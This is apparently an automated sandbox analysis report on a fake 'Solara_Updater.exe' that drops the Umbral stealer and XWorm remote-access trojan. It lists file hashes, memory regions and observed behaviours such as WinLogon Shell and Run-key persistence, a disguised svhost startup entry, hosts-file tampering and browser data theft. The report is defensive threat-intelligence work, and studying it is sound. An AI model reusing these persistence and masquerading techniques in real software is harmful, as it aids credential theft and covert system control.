SHA512 56df36df05187743357f3cda16f2b7791c4c760475b90f173ad3d0752475aee45e6549e062ee328f3b1f2ebd56aaa1bb9ceedb1f3200e2383455ac27e1cee043

C:\Users\Admin\AppData\Local\Temp\XClient.exe

MD5 28ff989c1d462f567aabb9c5ba76456b
SHA1 24be926b14f64f6a9f5b8248d1618bae9a7fc0b2
SHA256 a02fb0b588d89b4ea7f83fc303af6ab00b5ec81a39cf79b2e6ec65d3a3e4c63d
SHA512 2e639e5b5480c93c7605480de40e325c0692d3834f305d7d739f3569707e01cbd5d4c75c5fe4b02616edbb5c72b5f9df6466864a2b11fc862b35b5566d51bcba

C:\Users\Admin\AppData\Local\Temp\RustCheat.exe

MD5 ff8f5c2670894f74456e534b34d6a8fe
SHA1 e0b35ae06f68adf07e4616da8e91bb1f935e492a
SHA256 d9f3baf81271c395f4dc10e21d12bc2bfb875a8a28ede54abd54a0d8de194d37
SHA512 a58b08c3209bc196f914a82ca2b91a096988831bc45babb22ec2210303050cf03923ebf93e7a58926b8813328c672bec015cd0772f27a0192c661d83e796ffff

memory/2020-39-0x0000000001190000-0x00000000011A6000-memory.dmp

memory/2816-42-0x0000000000BA0000-0x0000000000BE0000-memory.dmp

memory/1332-43-0x000007FEF5DC0000-0x000007FEF67AC000-memory.dmp

memory/1728-48-0x000000001B770000-0x000000001BA52000-memory.dmp

memory/1728-49-0x0000000001F50000-0x0000000001F58000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\MGTQ1QPBF6XYJOYSUCSN.temp

MD5 b6b8bab093d4ff199935f22e50747dc0
SHA1 19def7e3ef7a0ea0abfe3def8e2ba3c157759b54
SHA256 45340bc56619f2e2d5cdecbd58edf4476f0ba1222de962171d3f5e3c2ee380e5
SHA512 270a56f366df93e9a70c91b9551cc5f5beca46607e7a7f03a933cf3173c93a6c5b9f778c1fda49663edb4a3af76e6c86f90520793614be9598c5f36edfc3f24f

memory/2380-55-0x000000001B6A0000-0x000000001B982000-memory.dmp

memory/2380-56-0x0000000001E80000-0x0000000001E88000-memory.dmp

\??\PIPE\srvsvc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

memory/720-84-0x0000000002860000-0x0000000002868000-memory.dmp

memory/720-83-0x000000001B650000-0x000000001B932000-memory.dmp

memory/268-95-0x000000001B6E0000-0x000000001B9C2000-memory.dmp

memory/268-96-0x0000000002330000-0x0000000002338000-memory.dmp

memory/2328-108-0x000000001B650000-0x000000001B932000-memory.dmp

memory/2328-109-0x0000000002220000-0x0000000002228000-memory.dmp

memory/2828-126-0x0000000000320000-0x0000000000360000-memory.dmp

C:\Windows\System32\drivers\etc\hosts

MD5 577f27e6d74bd8c5b7b0371f2b1e991c
SHA1 b334ccfe13792f82b698960cceaee2e690b85528
SHA256 0ade9ef91b5283eceb17614dd47eb450a5a2a371c410232552ad80af4fbfd5f9
SHA512 944b09b6b9d7c760b0c5add40efd9a25197c22e302c3c7e6d3f4837825ae9ee73e8438fc2c93e268da791f32deb70874799b8398ebae962a9fc51c980c7a5f5c

memory/2704-175-0x000000001B790000-0x000000001BA72000-memory.dmp

memory/2704-177-0x0000000002290000-0x0000000002298000-memory.dmp

memory/2040-197-0x0000000001350000-0x0000000001390000-memory.dmp

memory/2204-199-0x000007FEF5DC0000-0x000007FEF67AC000-memory.dmp

memory/2440-226-0x00000000012C0000-0x00000000012D6000-memory.dmp

memory/2300-239-0x0000000000280000-0x000000000045E000-memory.dmp

memory/2300-241-0x00000000005E0000-0x00000000005EE000-memory.dmp

memory/2300-243-0x0000000000610000-0x000000000062C000-memory.dmp

memory/2300-245-0x0000000000640000-0x0000000000658000-memory.dmp

memory/2300-247-0x00000000005F0000-0x00000000005F8000-memory.dmp

memory/2300-249-0x0000000000600000-0x000000000060C000-memory.dmp

C:\MSOCache\All Users\{90140000-00BA-0409-0000-0000000FF1CE}-C\bridgeblockportComBroker.exe

MD5 8ccc428a5a6f6139dc191d332f3de08b
SHA1 ae550a8fb67deeb1350020aa3fe8b0339db6bc71
SHA256 801c5ad5a7853f375e15e1da7361e09b898d3c8770e291b8016eb207bba8c749
SHA512 1479aac1b970722f47cbf77a01b213c84885af15b06e293bf9137863cbce44238832c5f4298dc56ca41847718f581d2bb434220824ffc5d54c08f1e55156e82e

memory/1668-293-0x00000000003D0000-0x00000000005AE000-memory.dmp

memory/2080-298-0x000000001B5C0000-0x000000001B8A2000-memory.dmp

memory/1548-307-0x00000000027A0000-0x00000000027A8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\e7lG3Dof0tiB7u3

MD5 02d2c46697e3714e49f46b680b9a6b83
SHA1 84f98b56d49f01e9b6b76a4e21accf64fd319140
SHA256 522cad95d3fa6ebb3274709b8d09bbb1ca37389d0a924cd29e934a75aa04c6c9
SHA512 60348a145bfc71b1e07cb35fa79ab5ff472a3d0a557741ea2d39b3772bc395b86e261bd616f65307ae0d997294e49b5548d32f11e86ef3e2704959ca63da8aac

C:\Users\Admin\AppData\Local\Temp\0oxgHCygznUf7EF

MD5 c9ff7748d8fcef4cf84a5501e996a641
SHA1 02867e5010f62f97ebb0cfb32cb3ede9449fe0c9
SHA256 4d3f3194cb1133437aa69bb880c8cbb55ddf06ff61a88ca6c3f1bbfbfd35d988
SHA512 d36054499869a8f56ac8547ccd5455f1252c24e17d2b185955390b32da7e2a732ace4e0f30f9493fcc61425a2e31ed623465f998f41af69423ee0e3ed1483a73

memory/2396-377-0x0000000000310000-0x0000000000350000-memory.dmp

memory/2276-415-0x0000000001EE0000-0x0000000001EE8000-memory.dmp

memory/2276-414-0x000000001B760000-0x000000001BA42000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\mq0WKMOC4v9hs1b\Display\Display.png

MD5 ecf765e18eded64fe607e5c21deade47
SHA1 2ec02f6dece315077da9e97174e04293ee07b85c
SHA256 53df102706734d46e13097748fa21e808b3bf422bc6407c39446629617d8e0c3
SHA512 5db8b57c2021dcc555aaca5ca919426ff060166335c58e8bd5f6f763c0da89fcb04d02414df909b793bdcacd0bd863c8af9dacb48c0f31fe502a3209a71bf298

memory/2720-431-0x0000000000F50000-0x0000000000F90000-memory.dmp

memory/2972-495-0x0000000000280000-0x0000000000288000-memory.dmp

memory/2704-496-0x0000000000970000-0x0000000000B4E000-memory.dmp

memory/1080-516-0x00000000001E0000-0x0000000000220000-memory.dmp

memory/2152-609-0x0000000000D40000-0x0000000000D48000-memory.dmp

memory/1764-610-0x0000000000080000-0x000000000025E000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-19 16:14

Reported

2024-05-19 16:17

Platform

win10v2004-20240426-en

Max time kernel

150s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

Signatures

Detect Umbral payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Modifies WinLogon for persistence

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\hostNet\\RuntimeBroker.exe\"" C:\hostNet\bridgeblockportComBroker.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\hostNet\\RuntimeBroker.exe\", \"C:\\Users\\Default User\\wscript.exe\"" C:\hostNet\bridgeblockportComBroker.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\hostNet\\RuntimeBroker.exe\", \"C:\\Users\\Default User\\wscript.exe\", \"C:\\Users\\All Users\\Templates\\fontdrvhost.exe\"" C:\hostNet\bridgeblockportComBroker.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\hostNet\\RuntimeBroker.exe\", \"C:\\Users\\Default User\\wscript.exe\", \"C:\\Users\\All Users\\Templates\\fontdrvhost.exe\", \"C:\\Recovery\\WindowsRE\\wscript.exe\"" C:\hostNet\bridgeblockportComBroker.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\hostNet\\RuntimeBroker.exe\", \"C:\\Users\\Default User\\wscript.exe\", \"C:\\Users\\All Users\\Templates\\fontdrvhost.exe\", \"C:\\Recovery\\WindowsRE\\wscript.exe\", \"C:\\Program Files (x86)\\Microsoft\\Solara_Updater.exe\"" C:\hostNet\bridgeblockportComBroker.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\hostNet\\RuntimeBroker.exe\", \"C:\\Users\\Default User\\wscript.exe\", \"C:\\Users\\All Users\\Templates\\fontdrvhost.exe\", \"C:\\Recovery\\WindowsRE\\wscript.exe\", \"C:\\Program Files (x86)\\Microsoft\\Solara_Updater.exe\", \"C:\\hostNet\\bridgeblockportComBroker.exe\"" C:\hostNet\bridgeblockportComBroker.exe N/A

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe

Umbral

stealer umbral

Xworm

trojan rat xworm

Drops file in Drivers directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\RustCheat.exe N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\RustCheat.exe N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\RustCheat.exe N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\RustCheat.exe N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\RustCheat.exe N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\RustCheat.exe N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\RustCheat.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\WScript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\WScript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\WScript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\WScript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\WScript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\WScript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\WScript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\WScript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\WScript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\WScript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\WScript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\WScript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\WScript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\WScript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\WScript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\WScript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\WScript.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svhost.lnk C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svhost.lnk C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\svhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A

Reads user/profile data of web browsers

spyware stealer

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svhost = "C:\\Users\\Admin\\AppData\\Roaming\\svhost.exe" C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker = "\"C:\\hostNet\\RuntimeBroker.exe\"" C:\hostNet\bridgeblockportComBroker.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\wscript = "\"C:\\Users\\Default User\\wscript.exe\"" C:\hostNet\bridgeblockportComBroker.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\wscript = "\"C:\\Recovery\\WindowsRE\\wscript.exe\"" C:\hostNet\bridgeblockportComBroker.exe N/A
